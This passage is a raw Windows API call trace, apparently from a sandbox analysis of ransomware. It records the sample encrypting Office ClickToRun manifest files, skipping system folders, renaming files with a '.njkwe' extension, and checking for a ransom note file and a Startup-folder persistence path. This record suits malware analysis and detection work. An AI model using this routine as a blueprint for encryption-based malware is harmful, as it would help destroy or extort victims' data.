nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.501] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.501] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.501] CloseHandle (hObject=0x434) returned 1 [0070.501] GetProcessHeap () returned 0xbe0000 [0070.501] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.501] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 137 [0070.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.502] GetProcessHeap () returned 0xbe0000 [0070.502] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.502] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2f02a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed2f02a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd38424c0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.officemuiset.msi.16.en-us.xml", cAlternateFileName="C2467F~1.XML")) returned 1 [0070.502] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.502] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.502] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.502] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.502] lstrcmpiW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.502] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml") returned 120 [0070.502] StrStrIW (lpFirst="C2RManifest.officemuiset.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.502] lstrcmpW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.502] lstrcmpW (lpString1="C2RManifest.officemuiset.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.502] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.502] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.503] GetTickCount () returned 0x1151ff8 [0070.503] GetTickCount () returned 0x1151ff8 [0070.503] GetTickCount () returned 0x1151ff8 [0070.503] GetTickCount () returned 0x1151ff8 [0070.503] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.503] GetProcessHeap () returned 0xbe0000 [0070.503] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.503] ReadFile (in: hFile=0x434, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x7fa, lpOverlapped=0x0) returned 1 [0070.505] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff806, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.505] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x7fa, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x7fa, lpOverlapped=0x0) returned 1 [0070.505] GetProcessHeap () returned 0xbe0000 [0070.505] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.505] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.505] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.505] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.505] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.505] CloseHandle (hObject=0x434) returned 1 [0070.505] GetProcessHeap () returned 0xbe0000 [0070.505] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.505] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 140 [0070.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.506] GetProcessHeap () returned 0xbe0000 [0070.506] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.506] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2f02a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed2f02a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd295b9b9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17b3c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", cAlternateFileName="C21839~1.XML")) returned 1 [0070.506] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.506] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.506] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.506] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.506] lstrcmpiW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.506] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned 131 [0070.506] StrStrIW (lpFirst="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.506] lstrcmpW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.506] lstrcmpW (lpString1="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.506] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.506] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.506] GetTickCount () returned 0x1151ff8 [0070.507] GetTickCount () returned 0x1151ff8 [0070.507] GetTickCount () returned 0x1151ff8 [0070.507] GetTickCount () returned 0x1151ff8 [0070.507] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.507] GetProcessHeap () returned 0xbe0000 [0070.507] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.507] ReadFile (in: hFile=0x434, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.508] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.508] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.509] GetProcessHeap () returned 0xbe0000 [0070.509] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.509] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.509] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.509] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.510] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.510] CloseHandle (hObject=0x434) returned 1 [0070.510] GetProcessHeap () returned 0xbe0000 [0070.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.510] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 151 [0070.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenote.onenote.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.510] GetProcessHeap () returned 0xbe0000 [0070.510] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.510] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2ca0b4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed2ca0b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd375d6d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4a4a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.onenotemui.msi.16.en-us.xml", cAlternateFileName="C24C3D~1.XML")) returned 1 [0070.510] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0070.510] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0070.510] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0070.510] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0070.511] lstrcmpiW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0070.511] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml") returned 118 [0070.511] StrStrIW (lpFirst="C2RManifest.onenotemui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0070.511] lstrcmpW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.511] lstrcmpW (lpString1="C2RManifest.onenotemui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0070.511] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.1", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.511] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.513] GetTickCount () returned 0x1152007 [0070.513] GetTickCount () returned 0x1152007 [0070.513] GetTickCount () returned 0x1152007 [0070.513] GetTickCount () returned 0x1152007 [0070.514] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.514] GetProcessHeap () returned 0xbe0000 [0070.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.514] ReadFile (in: hFile=0x434, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.515] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.515] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0070.516] GetProcessHeap () returned 0xbe0000 [0070.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.516] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.516] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.516] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.516] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0070.516] CloseHandle (hObject=0x434) returned 1 [0070.516] GetProcessHeap () returned 0xbe0000 [0070.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0070.516] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 138 [0070.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.onenotemui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0070.517] GetProcessHeap () returned 0xbe0000 [0070.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0070.517] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2a3e81, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed2a3e81, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd29a7ddb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", cAlternateFileName="C24EFF~1.XML")) returned 1 [0070.517] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0070.517] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0070.517] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0070.517] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0070.517] lstrcmpiW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0070.517] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml") returned 123 [0070.517] StrStrIW (lpFirst="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0070.517] lstrcmpW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0070.517] lstrcmpW (lpString1="C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0070.517] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.m", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0070.517] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osm.osm.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0070.518] GetTickCount () returned 0x1152007 [0070.518] GetTickCount () returned 0x1152007 [0070.518] GetTickCount () returned 0x1152007 [0070.518] GetTickCount () returned 0x1152007 [0070.518] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0070.518] GetProcessHeap () returned 0xbe0000 [0070.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4c840 [0070.518] ReadFile (in: hFile=0x434, lpBuffer=0xc4c840, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesRead=0x380f2d4*=0x5f6, lpOverlapped=0x0) returned 1 [0070.520] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffa0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.520] WriteFile (in: hFile=0x434, lpBuffer=0xc4c840*, nNumberOfBytesToWrite=0x5f6, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4c840*, lpNumberOfBytesWritten=0x380f2d4*=0x5f6, lpOverlapped=0x0) returned 1 [0070.520] GetProcessHeap () returned 0xbe0000 [0070.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4c840 | out: hHeap=0xbe0000) returned 1 [0070.520] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.520] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0070.520] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0070.520] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, 